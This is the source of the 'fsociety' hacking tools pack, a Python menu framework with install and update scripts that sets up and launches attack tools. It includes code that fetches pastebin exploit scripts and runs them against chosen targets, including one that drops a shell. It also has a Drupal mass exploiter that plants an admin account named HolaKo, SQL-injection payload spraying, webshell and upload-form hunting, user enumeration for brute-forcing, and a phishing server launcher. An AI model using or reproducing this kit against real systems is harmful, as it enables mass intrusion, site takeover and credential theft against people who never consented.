--depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n\n def run(self, target):\n logPath = \"logs/cmsmap-\" + \\\n strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime()) + \".txt\"\n try:\n os.system(\"python %s/cmsmap.py -t %s -o %s\" %\n (self.installDir, target, logPath))\n except:\n pass\n\n\nclass XSStrike:\n XSStrikeLogo = '''\n Yb dP .dP\"Y8 .dP\"Y8 888888 88\"\"Yb 88 88 dP 888888\n YbdP `Ybo.\" `Ybo.\" 88 88__dP 88 88odP 88__\n dPYb o.`Y8b o.`Y8b 88 88\"Yb 88 88\"Yb 88\"\"\n dP Yb 8bodP' 8bodP' 88 88 Yb 88 88 Yb 888888\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"XSStrike\"\n self.gitRepo = \"https://github.com/UltimateHackers/XSStrike.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.XSStrikeLogo)\n self.run()\n response = raw_input(continuePrompt)\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"pip install -r %s/requirements.txt\" % self.installDir)\n\n def run(self):\n os.system(\"python %s/xsstrike\" % self.installDir)\n\n\nclass doork:\n doorkLogo = '''\n 8888b. dP\"Yb dP\"Yb 88\"\"Yb 88 dP\n 8I Yb dP Yb dP Yb 88__dP 88odP\n 8I dY Yb dP Yb dP 88\"Yb 88\"Yb\n 8888Y\" YbodP YbodP 88 Yb 88 Yb\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"doork\"\n self.gitRepo = \"https://github.com/AeonDave/doork.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.doorkLogo)\n target = raw_input(\" Enter a Target: \")\n self.run(target)\n response = raw_input(continuePrompt)\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"pip install beautifulsoup4 requests Django==1.11\")\n\n def run(self, target):\n if not \"http://\" in target:\n target = \"http://\" + target\n logPath = \"logs/doork-\" + \\\n strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime()) + \".txt\"\n try:\n os.system(\"python %s/doork.py -t %s -o %s\" %\n (self.installDir, target, logPath))\n except KeyboardInterrupt:\n pass\n\n\nclass crips:\n cripsLogo = '''\n dP\"\"b8 88\"\"Yb 88 88\"\"Yb .dP\"Y8\n dP `\" 88__dP 88 88__dP `Ybo.\"\n Yb 88\"Yb 88 88\"\"\" o.`Y8b\n YboodP 88 Yb 88 88 8bodP'\n '''\n\n def __init(self):\n self.installDir = toolDir + \"Crips\"\n self.gitRepo = \"https://github.com/Manisso/Crips.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.cripsLogo)\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir) or os.path.isdir(\"/usr/share/doc/Crips\"))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"bash %s/install.sh\" % self.installDir)\n\n def run(self):\n try:\n os.system(\"crips\")\n except:\n pass\n\n\n'''\nPassword Attack Tools Classes\n'''\n\n\nclass passwordAttacksMenu:\n menuLogo = '''\n 88\"\"Yb db .dP\"Y8 .dP\"Y8 Yb dP 8888b.\n 88__dP dPYb `Ybo.\" `Ybo.\" Yb db dP 8I Yb\n 88\"\"\" dP__Yb o.`Y8b o.`Y8b YbdPYbdP 8I dY\n 88 dP\"\"\"\"Yb 8bodP' 8bodP' YP YP 8888Y\"\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\" {1}--Cupp - Common User Passwords Profiler\")\n print(\n \" {2}--BruteX - Automatically bruteforces all services running on a target\\n\")\n print(\" {99}-Back To Main Menu \\n\")\n choice3 = raw_input(\"passwd ~# \")\n clearScr()\n if choice3 == \"1\":\n cupp()\n elif choice3 == \"2\":\n brutex()\n elif choice3 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass cupp:\n cuppLogo = '''\n dP\"\"b8 88 88 88\"\"Yb 88\"\"Yb\n dP `\" 88 88 88__dP 88__dP\n Yb Y8 8P 88\"\"\" 88\"\"\"\n YboodP `YbodP' 88 88\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"cupp\"\n self.gitRepo = \"https://github.com/Mebus/cupp.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.cuppLogo)\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n\n def run(self):\n os.system(\"python %s/cupp.py -i\" % self.installDir)\n\n\n'''\nWireless Testing Tools Classes\n'''\n\n\nclass wirelessTestingMenu:\n menuLogo = '''\n Yb dP 88 88\"\"Yb 888888 88 888888 .dP\"Y8 .dP\"Y8\n Yb db dP 88 88__dP 88__ 88 88__ `Ybo.\" `Ybo.\"\n YbdPYbdP 88 88\"Yb 88\"\" 88 .o 88\"\" o.`Y8b o.`Y8b\n YP YP 88 88 Yb 888888 88ood8 888888 8bodP' 8bodP'\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\" {1}--reaver \")\n print(\" {2}--pixiewps\")\n print(\" {3}--Bluetooth Honeypot GUI Framework \\n\")\n print(\" {99}-Back To The Main Menu \\n\")\n choice4 = raw_input(fsocietyPrompt)\n clearScr()\n if choice4 == \"1\":\n reaver()\n elif choice4 == \"2\":\n pixiewps()\n elif choice4 == \"3\":\n bluepot()\n elif choice4 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass reaver:\n def __init__(self):\n self.installDir = toolDir + \"reaver\"\n self.gitRepo = \"https://github.com/t6x/reaver-wps-fork-t6x.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\n \"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps\")\n os.system(\"cd %s/\" % self.installDir)\n os.system(\"./configure\")\n os.system(\"make\")\n os.system(\"sudo make install\")\n\n def run(self):\n os.system(\"reaver --help\")\n\n\nclass pixiewps:\n def __init__(self):\n self.installDir = toolDir + \"pixiewps\"\n self.gitRepo = \"https://github.com/wiire/pixiewps.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"apt-get -y install build-essential\")\n os.system(\"make\")\n os.system(\"sudo make install\")\n\n def run(self):\n os.system(\"pixiewps --help\")\n\n\nclass bluepot:\n def __init__(self):\n self.installDir = toolDir + \"bluepot\"\n\n if not self.installed():\n self.install()\n clearScr()\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"apt-get install libbluetooth-dev\")\n os.system(\n \"wget -O - https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz | tar xfz -\")\n os.system(\"mv bluepot/ %s/\" % self.installDir)\n\n def run(self):\n os.system(\"sudo java -jar %s/BluePot-0.1.jar\" % self.installDir)\n\n\n'''\nExploitation Tools Classes\n'''\n\n\nclass exploitationToolsMenu:\n menuLogo = '''\n 888888 Yb dP 88\"\"Yb 88\n 88__ YbdP 88__dP 88\n 88\"\" dPYb 88\"\"\" 88 .o\n 888888 dP Yb 88 88ood8\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\" {1}--ATSCAN\")\n print(\" {2}--sqlmap\")\n print(\" {3}--Shellnoob\")\n print(\" {4}--commix\")\n print(\" {5}--FTP Auto Bypass\")\n print(\" {6}--JBoss-Autopwn\")\n print(\" {7}--Blind SQL Automatic Injection And Exploit\")\n print(\" {8}--Bruteforce the Android Passcode given the hash and salt\")\n print(\" {9}--Joomla SQL injection Scanner \\n \")\n print(\" {99}-Go Back To Main Menu \\n\")\n choice5 = raw_input(fsocietyPrompt)\n clearScr()\n if choice5 == \"1\":\n atscan()\n elif choice5 == \"2\":\n sqlmap()\n elif choice5 == \"3\":\n shellnoob()\n elif choice5 == \"4\":\n commix()\n elif choice5 == \"5\":\n gabriel()\n elif choice5 == \"6\":\n jboss()\n elif choice5 == \"7\":\n bsqlbf()\n elif choice5 == \"8\":\n androidhash()\n elif choice5 == \"9\":\n cmsfew()\n elif choice5 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass brutex:\n def __init__(self):\n self.installDir = toolDir + \"brutex\"\n self.gitRepo = \"https://github.com/1N3/BruteX.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n if not os.path.isdir(\"/usr/share/brutex\"):\n os.makedirs(\"/usr/share/brutex\")\n os.system(\"cd %s && chmod +x install.sh && ./install.sh\" % self.installDir)\n\n def run(self):\n target = raw_input(\"Enter Target IP: \")\n os.system(\"brutex %s\" % target)\n\n\nclass arachni:\n def __init__(self):\n self.installDir = toolDir + \"arachni\"\n self.gitRepo = \"https://github.com/Arachni/arachni.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n self.run()\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"cd %s/\" % self.installDir)\n os.system(\n \"gem install bundler && bundle install --without prof && rake install\")\n\n def run(self):\n target = raw_input(\"Enter Target Hostname: \")\n os.system(\"arachni %s --output-debug 2> %sarachni/%s.log\" %\n (target, logDir, strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime())))\n\n# Updated to Here\n\n\ndef weeman():\n print(\"HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).\")\n if yesOrNo():\n os.system(\n \"git clone --depth=1 https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py\")\n else:\n fsociety()\n\n\ndef gabriel():\n print(\"Abusing authentication bypass of Open&Compact (Gabriel's)\")\n os.system(\"wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py\")\n clearScr()\n os.system(\"python gabriel.py\")\n ftpbypass = raw_input(\"Enter Target IP and Use Command:\")\n os.system(\"python gabriel.py %s\" % ftpbypass)\n\n\ndef sitechecker():\n os.system(\"wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py\")\n clearScr()\n os.system(\"python ch01.py\")\n\n\ndef ifinurl():\n print(''' This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.''')\n print('Do You Want To Install InurlBR ? ')\n cinurl = raw_input(\"Y/N: \")\n if cinurl in yes:\n inurl()\n else:\n fsociety()\n\n\ndef bsqlbf():\n clearScr()\n print(\"This tool will only work on blind sql injection\")\n cbsq = raw_input(\"select target: \")\n os.system(\"wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl\")\n os.system(\"perl bsqlbf.pl -url %s\" % cbsq)\n os.system(\"rm bsqlbf.pl\")\n\n\ndef atscan():\n print (\"Do You To Install ATSCAN ?\")\n if yesOrNo():\n os.system(\"rm -rf ATSCAN\")\n os.system(\n \"git clone --depth=1 https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl\")\n else:\n fsociety()\n\n\ndef commix():\n print (\"Automated All-in-One OS Command Injection and Exploitation Tool.\")\n print (\"usage: python commix.py --help\")\n if yesOrNo():\n os.system(\n \"git clone --depth=1 https://github.com/stasinopoulos/commix.git commix\")\n os.system(\"cd commix\")\n os.system(\"python commix.py\")\n os.system(\"\")\n else:\n informationGatheringMenu.completed(\"Commix\")\n\n\ndef vbulletinrce():\n os.system(\"wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl\")\n os.system(\"perl tmp.pl\")\n\n\ndef joomlarce():\n os.system(\"wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py\")\n clearScr()\n print(\"if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt\")\n jmtarget = raw_input(\"Select a targets list:\")\n os.system(\"python temp.py %s\" % jmtarget)\n\n\ndef inurl():\n dork = raw_input(\"select a Dork:\")\n output = raw_input(\"select a file to save:\")\n os.system(\n \"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1\".format(dork, output))\n webHackingMenu.completed(\"InurlBR\")\n\n\ndef insinurl():\n os.system(\n \"git clone --depth=1 https://github.com/googleinurl/SCANNER-INURLBR.git\")\n os.system(\"chmod +x SCANNER-INURLBR/inurlbr.php\")\n os.system(\"apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl\")\n os.system(\"mv /SCANNER-INURLBR/inurbr.php inurlbr.php\")\n clearScr()\n inurl()\n\n\ndef jboss():\n clearScr()\n print (\"This JBoss script deploys a JSP shell on the target JBoss AS server. Once\")\n print (\"deployed, the script uses its upload and command execution capability to\")\n print (\"provide an interactive session.\")\n print (\"\")\n print (\"usage: ./e.sh target_ip tcp_port \")\n print(\"Continue: y/n\")\n if yesOrNo():\n os.system(\n \"git clone --depth=1 https://github.com/SpiderLabs/jboss-autopwn.git\"), sys.exit()\n else:\n fsociety()\n\n\ndef wppluginscan():\n Notfound = [404, 401, 400, 403, 406, 301]\n sitesfile = raw_input(\"sites file: \")\n filepath = raw_input(\"Plugins File: \")\n\n def scan(site, dir):\n global resp\n try:\n conn = httplib.HTTPConnection(site)\n conn.request('HEAD', \"/wp-content/plugins/\" + dir)\n resp = conn.getresponse().status\n except Exception as message:\n print(\"Cant Connect:\" + message) \n pass\n\n def timer():\n now = time.localtime(time.time())\n return time.asctime(now)\n\n def main():\n sites = open(sitesfile).readlines()\n plugins = open(filepath).readlines()\n for site in sites:\n site = site.rstrip()\n for plugin in plugins:\n plugin = plugin.rstrip()\n scan(site, plugin)\n if resp not in Notfound:\n print(\"+----------------------------------------+\")\n print(\"| current site:\" + site)\n print(\"| Found Plugin: \" + plugin)\n print(\"| Result:\", resp)\n\n\ndef sqlmap():\n print (\"usage: python sqlmap.py -h\")\n if yesOrNo():\n os.system(\n \"git clone --depth=1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & \")\n else:\n informationGatheringMenu.completed(\"SQLMap\")\n\n\ndef grabuploadedlink(url):\n try:\n for dir in directories:\n currentcode = urllib.urlopen(url + dir).getcode()\n if currentcode == 200 or currentcode == 403:\n print \"-------------------------\"\n print \" [ + ] Found Directory: \" + str(url + dir) + \" [ + ]\"\n print \"-------------------------\"\n upload.append(url + dir)\n except:\n pass\n\n\ndef grabshell(url):\n try:\n for upl in upload:\n for shell in shells:\n currentcode = urllib.urlopen(upl + shell).getcode()\n if currentcode == 200:\n print \"-------------------------\"\n print \" [ ! ] Found Shell: \" + \\\n str(upl + shell) + \" [ ! ]\"\n print \"-------------------------\"\n except:\n pass\n\n\ndef shelltarget():\n print(\"Exemple: http://target.com\")\n line = raw_input(\"target: \")\n line = line.rstrip()\n grabuploadedlink(line)\n grabshell(line)\n\n\ndef poet():\n print(\"POET is a simple POst-Exploitation Tool.\\n\")\n if yesOrNo():\n os.system(\"git clone --depth=1 https://github.com/mossberg/poet.git\")\n os.system(\"python poet/server.py\")\n else:\n postExploitationMenu.completed(\"POET\")\n\n\ndef ssls():\n print('''sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping\n attacks.\n It requires Python 2.5 or newer, along with the 'twisted' python module.''')\n if yesOrNo():\n os.system(\"git clone --depth=1 https://github.com/moxie0/sslstrip.git\")\n os.system(\"apt-get install python-twisted-web\")\n os.system(\"python sslstrip/setup.py\")\n else:\n sniffingSpoofingMenu.completed(\"SSlStrip\")\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

')\n self.portScanner(1, ran)\n elif choice == '10':\n self.portScanner(2, None)\n elif choice == '11':\n self.getServerBanner()\n elif choice == '12':\n self.cloudflareBypasser()\n elif choice == '99':\n fsociety()\n con = raw_input(' Continue [Y/n] -> ')\n if con[0].upper() == 'N':\n exit()\n else:\n clearScr()\n print menuu\n\n def getSites(self, a):\n '''\n get all websites on same server\n from bing search\n '''\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n self.serverip + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

\", site + admin\n except IOError:\n pass\n ############################\n # find ZIP files\n\n def findZip(self):\n '''\n find zip files from grabbed websites\n it may contain useful informations\n '''\n zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',\n 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']\n clearScr()\n print \"[~] Finding zip file\"\n for site in self.sites:\n for zip1 in zipList:\n try:\n if urllib.urlopen(site + zip1).getcode() == 200:\n print \" [*] Found zip file -> \", site + zip1\n except IOError:\n pass\n\n def findUp(self):\n '''\n find upload forms from grabbed\n websites the attacker may succeed to\n upload malicious files like webshells\n '''\n upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',\n 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']\n clearScr()\n print \"[~] Finding Upload\"\n for site in self.sites:\n for up in upList:\n try:\n if (urllib.urlopen(site + up).getcode() == 200):\n html = urllib.urlopen(site + up).readlines()\n for line in html:\n if re.findall('type=file', line):\n print \" [*] Found upload -> \", site + up\n except IOError:\n pass\n\n def getUsers(self):\n '''\n get server users using a method found by\n iranian hackers , the attacker may\n do a bruteforce attack on CPanel, ssh, ftp or\n even mysql if it supports remote login\n (you can use medusa or hydra)\n '''\n clearScr()\n print \"[~] Grabbing Users\"\n userslist = []\n for site1 in self.sites:\n try:\n site = site1\n site = site.replace('http://www.', '')\n site = site.replace('http://', '')\n site = site.replace('.', '')\n if '-' in site:\n site = site.replace('-', '')\n site = site.replace('/', '')\n while len(site) > 2:\n resp = urllib2.urlopen(\n site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()\n if 'invalid username' not in resp.lower():\n print '\\t [*] Found -> ', site\n userslist.append(site)\n break\n else:\n print site\n\n site = site[:-1]\n except:\n pass\n\n clearScr()\n for user in userslist:\n print user\n\n def cloudflareBypasser(self):\n '''\n tries to bypass cloudflare i already wrote\n in my blog how it works, i learned this\n method from a guy in madleets\n '''\n clearScr()\n print \"[~] Bypassing cloudflare\"\n subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']\n for site in self.sites:\n site.replace('http://', '')\n site.replace('/', '')\n try:\n ip = socket.gethostbyname(site)\n except socket.error:\n pass\n for sub in subdoms:\n doo = sub + '.' + site\n print ' [~] Trying -> ', doo\n try:\n ddd = socket.gethostbyname(doo)\n if ddd != ip:\n print ' [*] Cloudflare bypassed -> ', ddd\n break\n except socket.error:\n pass\n\n def getServerBanner(self):\n '''\n simply gets the server banner\n the attacker may benefit from it\n like getting the server side software\n '''\n clearScr()\n try:\n s = 'http://' + self.serverip\n httpresponse = urllib.urlopen(s)\n print ' [*] Server header -> ', httpresponse.headers.getheader(\n 'server')\n except:\n print('[*] Server header -> Not Found')\n\n def grabSqli(self):\n '''\n just grabs all websites in server with php?id= dork\n for scanning for error based sql injection\n '''\n page = 1\n lista = []\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n self.serverip + \"+php?id=&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

<\",\n \"3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27\"]\n check = re.compile(\n \"Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error\", re.I)\n for url in s:\n try:\n for param in url.split('?')[1].split('&'):\n for payload in payloads:\n power = url.replace(param, param + payload.strip())\n\n html = urllib2.urlopen(power).readlines()\n for line in html:\n checker = re.findall(check, line)\n if len(checker) != 0:\n print ' [*] SQLi found -> ', power\n except:\n pass\n\n\n def portScanner(self, mode, ran):\n '''\n simple port scanner works with range of ports\n or with common ports (al-swisre idea)\n '''\n clearScr()\n print \"[~] Scanning Ports\"\n\n if mode == 1:\n a = ran.split('-')\n start = int(a[0])\n end = int(a[1])\n for i in range(start, end):\n do_it(self.serverip, i)\n elif mode == 2:\n for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:\n do_it(self.serverip, port)\n\n\ndef do_it(ip, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n sock = sock.connect_ex((ip, port))\n if sock == 0:\n print \" [*] Port %i is open\" % port\n\n\n############################\nminu = '''\n\\t 1: Drupal Bing Exploiter\n\\t 2: Get Drupal Websites\n\\t 3: Drupal Mass Exploiter\n\\t 99: Back To Main Menu\n'''\n\n\ndef drupal():\n '''Drupal Exploit Binger All Websites Of server '''\n ip = raw_input('1- IP: ')\n page = 1\n while page <= 50:\n\n url = \"http://www.bing.com/search?q=ip%3A\" + ip + \"&go=Valider&qs=n&form=QBRE&pq=ip%3A\" + \\\n ip + \"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=\" + \\\n str(page)\n req = urllib2.Request(url)\n opreq = urllib2.urlopen(req).read()\n findurl = re.findall(\n '

\" + site\n\n print \"user:HolaKo\\npass:admin\"\n a = open('up.txt', 'a')\n a.write(site + '\\n')\n a.write(\"user:\" + user + \"\\npass:\" + pwd + \"\\n\")\n else:\n print \"[-] Expl Not Found:( \"\n\n except Exception as ex:\n print ex\n sys.exit(0)\n\n # Drupal Server ExtraCtor\n\n\ndef getdrupal():\n ip = raw_input('Enter The Ip: ')\n page = 1\n sites = list()\n while page <= 50:\n\n url = \"http://www.bing.com/search?q=ip%3A\" + ip + \\\n \"+node&go=Valider&qs=ds&form=QBRE&first=\" + str(page)\n req = urllib2.Request(url)\n opreq = urllib2.urlopen(req).read()\n findurl = re.findall(\n '

\" + url\n print \"[-]username:HolaKo\\n[-]password:admin\"\n save = open('drupal.txt', 'a')\n save.write(\n url + \"\\n\" + \"[-]username:HolaKo\\n[-]password:admin\\n\")\n\n else:\n print i + \"=> exploit not found \"\n except Exception as ex:\n print ex\n\n\ndef maine():\n\n print minu\n choose = raw_input(\"choose a number: \")\n while True:\n\n if choose == \"1\":\n drupal()\n elif choose == \"2\":\n getdrupal()\n elif choose == \"3\":\n drupallist()\n elif choose == \"4\":\n about()\n elif choose == \"99\":\n fsociety()\n else:\n maine()\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

\" + sqli)\n\n\ndef sqlscan():\n ip = raw_input('Enter IP -> ')\n grabsqli(ip)\n\n\ndef unique(seq):\n seen = set()\n return [seen.add(x) or x for x in seq if x not in seen]\n\n\ndef bing_all_grabber(s):\n lista = []\n page = 1\n while page <= 101:\n try:\n bing = \"http://www.bing.com/search?q=ip%3A\" + \\\n s + \"+&count=50&first=\" + str(page)\n openbing = urllib2.urlopen(bing)\n readbing = openbing.read()\n findwebs = re.findall('

\"$INSTALL_DIR/fsociety\";\nchmod +x \"$INSTALL_DIR/fsociety\";\nif [ \"$TERMUX\" = true ]; then\n cp \"$INSTALL_DIR/fsociety\" \"$BIN_DIR\"\n cp \"$INSTALL_DIR/fsociety.cfg\" \"$BIN_DIR\"\nelse\n sudo cp \"$INSTALL_DIR/fsociety\" \"$BIN_DIR\"\n sudo cp \"$INSTALL_DIR/fsociety.cfg\" \"$BIN_DIR\"\nfi\nrm \"$INSTALL_DIR/fsociety\";\n\n\nif [ -d \"$INSTALL_DIR\" ] ;\nthen\n echo \"\";\n echo \"[✔] Tool installed successfully! [✔]\";\n echo \"\";\n echo \"[✔]====================================================================[✔]\";\n echo \"[✔] All is done!! You can execute tool by typing fsociety ! [✔]\";\n echo \"[✔]====================================================================[✔]\";\n echo \"\";\nelse\n echo \"[✘] Installation failed! [✘] \";\n exit\nfi\n" }, { "path": "snap/snapcraft.yaml", "content": "\n name: fsociety\n version: '0.3' # just for humans, typically '1.2+git' or '1.3.2'\n summary: fsociety Hacking Tools Pack – A Penetration Testing Framework # 79 char long summary\n description: Fsociety Hacking Tools Pack\n\nA Penetration Testing Framework, you will have every script that a hacker needs\nFsociety Contains All Tools Used in Mr. Robot Series\n grade: devel # must be 'stable' to release into candidate/stable channels\n confinement: devmode # use 'strict' once you have the right plugs and slots\n\n parts:\n my-part:\n # See 'snapcraft plugins'\n plugin: nil\n \n" }, { "path": "uninstall", "content": "#!/bin/bash\n# Script for uninstall Fsociety tools\n\n# ----- FSociety Team -----\n\n#\n\n# Coded by: CRO-THEHACKER\n\n# * https://github.com/CRO-THEHACKER/\n\n# Feel free to share any ideas with the\n# project!\n#\n# -------------------------\n\nclear\n\necho \"\n\n\";\n\nif [ \"$PREFIX\" = \"/data/data/com.termux/files/usr\" ]; then\n\n INSTALL_DIR=\"$PREFIX/usr/share/doc/fsociety\"\n\n BIN_DIR=\"$PREFIX/bin/\"\n\n BASH_PATH=\"$PREFIX/bin/bash\"\n\n TERMUX=true\n\nelif [ \"$(uname)\" = \"Darwin\" ]; then\n\n INSTALL_DIR=\"/usr/local/fsociety\"\n\n BIN_DIR=\"/usr/local/bin/\"\n\n BASH_PATH=\"/bin/bash\"\n\n TERMUX=false\n\nelse\n\n INSTALL_DIR=\"$HOME/.fsociety\"\n\n BIN_DIR=\"/usr/local/bin/\"\n\n BASH_PATH=\"/bin/bash\"\n\n TERMUX=false\n\nfi\n\necho \"[✔] Checking directories...\";\n\nif [ -d \"$INSTALL_DIR\" ]; then\n\n rm -rf \"$INSTALL_DIR\"\n\n rm \"$BIN_DIR/fsociety*\"\n\n sudo rm -rf \"$INSTALL_DIR\"\n\n sudo rm \"$BIN_DIR/fsociety*\"\n\n else\n\n echo \"[✘] If you want to uninstall you must remove previous installations [✘] \";\n\n echo \"[✘] Failed! [✘] \";\n\nfi\n\necho \"[✔] Cleaning up old directories...\";\n\nif [ -d \"$ETC_DIR/Manisso\" ]; then\n\n echo \"$DIR_FOUND_TEXT\"\n\n if [ \"$TERMUX\" = true ]; then\n\n rm -rf \"$ETC_DIR/Manisso\"\n\n else\n\n sudo rm -rf \"$ETC_DIR/Manisso\"\n\n fi\n\nfi\n\nclear\n\nclear\n\necho \"[✔] all good!\"\n" }, { "path": "update.sh", "content": "#!/bin/bash\n# Script for update Fsociety tools\n\ngit clone --depth=1 https://github.com/Manisso/fsociety.git\nsudo chmod +x fsociety/install.sh\nbash fsociety/install.sh\n" } ]